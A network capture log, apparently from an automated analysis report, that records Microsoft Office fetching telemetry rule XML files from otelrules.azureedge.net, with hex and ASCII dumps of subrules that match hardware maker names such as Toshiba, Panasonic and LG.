                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        33192.168.2.54974213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:25 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: c6b44c52-001e-0028-1ef0-2cc49f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142525Z-16547b76f7ftdm8dhC1DFWs13g0000000km000000000pvgr
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        34192.168.2.54974313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:25 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142525Z-16547b76f7fdtmzhhC1DFW6zhc00000007ng00000000c7sv
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        35192.168.2.54974413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:25 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 1d5973b4-701e-0050-2a24-326767000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142525Z-16547b76f7fdtmzhhC1DFW6zhc00000007ng00000000c7sw
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:25 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        36192.168.2.54974513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:26 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 423
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 5d06d88c-b01e-0084-0908-2cd736000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142526Z-16547b76f7fk9g8vhC1DFW825400000000m000000000h8xr
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        37192.168.2.54974613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:26 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 478
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: aa8338a3-a01e-0021-72a2-34814c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142526Z-r178fb8d765hbcjvhC1DFW50zc00000002sg00000000118x
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        38192.168.2.54974713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:26 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: fce7b0bb-601e-0050-294b-352c9c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142526Z-1749fc9bdbdns7kfhC1DFWb6c400000002n000000000k5np
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        39192.168.2.54974813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:26 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9993dcf0-c01e-0046-3a0d-362db9000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142526Z-1749fc9bdbdlzhmchC1DFWe68s00000002d000000000h7nc
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        40192.168.2.54974913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:26 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 400
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: a8264c91-f01e-0052-7a79-369224000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142526Z-r178fb8d765mr9nqhC1DFWs8m800000000t000000000gze4
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:26 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
